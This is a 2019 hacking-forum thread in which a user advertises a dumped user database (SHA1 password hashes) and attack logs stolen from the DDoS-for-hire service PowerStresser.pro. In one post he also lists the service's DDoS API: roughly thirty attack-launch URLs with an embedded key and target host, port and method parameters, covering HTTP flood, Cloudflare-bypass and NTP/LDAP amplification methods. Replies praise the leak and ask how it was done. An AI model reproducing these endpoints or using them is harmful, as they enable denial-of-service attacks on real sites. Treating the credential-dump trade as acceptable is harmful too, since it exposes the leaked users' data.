PowerStresser.pro | 355 Users & Attack Logs
by PentesterNoob - November 16, 2019 at 03:36 AM
#1
Dumped around a week ago, password hashes are SHA1. https://powerstresser.pro/http://vps724068.ovh.net/http://51.77.214.209/

"ID,dat,rank,email,status,expire,2auth,username,referral,activity,password,referedBy,testattack,membership,referralbalance"

User DB:
Hidden Content
You must register or login to view this content.


Attack Logs:
Hidden Content
You must register or login to view this content.
#2
are the links still up i've been looking for this
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Multi-accounting
#3
(November 22, 2019 at 04:06 PM)ShadowArion4384 Wrote: are the links still up i've been looking for this

They are, just checked. Smile
#4
If you wouldn't mind. Could you add me on discord someone_arion_093#1337 or send me a DM here. i would be interested in knowing how you did this.
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Multi-accounting
#5
Nice, thank you for share Wink
#6
I managed to use their DDoS api for a month before they realized I had it.. damn

This is the API they used: (Or still use, just with a different key)

Spoiler
id,vip,api,name,slots,methods
93,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],httpnull,5,httpnull
94,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],zeus-http,5,zeus-http
95,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],RANDOM,5,RANDOM
96,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],POST,5,POST
97,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],GET,5,GET
98,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],httpflood,5,httpflood
99,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],CLOUDFLARE,5,CLOUDFLARE
100,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],http,5,http
101,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],apache,5,apache
102,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],boosthttp,5,boosthttp
103,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTPSTRONG,5,HTTPSTRONG
104,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTP-DRAIN,5,HTTP-DRAIN
105,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTP-HEAD,5,HTTP-HEAD
106,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTPBYPASS,5,HTTPBYPASS
107,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],SMART-HTTP,5,SMART-HTTP
108,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTPABUSE,5,HTTPABUSE
109,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTP-COOKIE,5,HTTP-COOKIE
110,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],x-Bypass,5,x-Bypass
111,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],CloudJS,5,CloudJS
112,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTPKILL,5,HTTPKILL
113,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],HTTP-RND,5,HTTP-RND
114,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],CLOUDFLARE-UAM,5,CLOUDFLARE-UAM
116,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],CF-UAM,5,CF-UAM
117,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],DDOS-GUARD,5,DDOS-GUARD
120,0,https://apijsboot.xyz/l4/l4.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],NTP,5,NTP
121,0,https://apijsboot.xyz/l4/l4.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],wdym,5,wdym
122,0,https://apijsboot.xyz/l4/l4.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],LDAP,5,LDAP
124,0,https://apijsboot.xyz/l7.php?page=Api&key=mortal&host=[host]&port=[port]&time=[time]&method=[method],x-Cloudflare,5,x-Cloudflare

(December 01, 2019 at 04:08 PM)ShadowArion4384 Wrote: If you wouldn't mind. Could you add me on discord someone_arion_093#1337 or send me a DM here. i would be interested in knowing how you did this.

I don't use Discord

edit: are you one of the owners, at least you are on the database lol

(December 01, 2019 at 07:44 PM)xUDKMe Wrote: Nice, thank you for share Wink

No problem mate, I hope you have some use for it Smile
#7
(December 23, 2019 at 09:24 AM)PentesterNoob Wrote: I managed to use their DDoS api for a month before they realized I had it.. damn

This is the API they used: (Or still use, just with a different key)

For real, no wonder they got pwned :D Good one mate!
#8
Biggrin Biggrin Biggrin thanksss
#9
No @PentesterNoob i'm not a owner. I've previously exploited another vuln on this site. May i ask how the API has led to dumping the DB?
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Multi-accounting
#10
This thread has a bad link, please reply to the message you were sent so I can replace the current link and reinstate your thread.

Possibly Related Threads…
Thread Author Replies Views Last Post
[Removed] NSW Education department cyber attack bpattol92 3 1,155 July 09, 2021 at 01:41 PM
Last Post: Lycanroc
Transdeals.in Users Database Leak 33k+ Users xorro 5 2,072 January 15, 2021 at 07:11 PM
Last Post: Jaw
BTC Payment Logs Users securityteam 2 1,666 January 02, 2019 at 06:27 PM
Last Post: BoringApe

 Users browsing this thread: 1 Guest(s)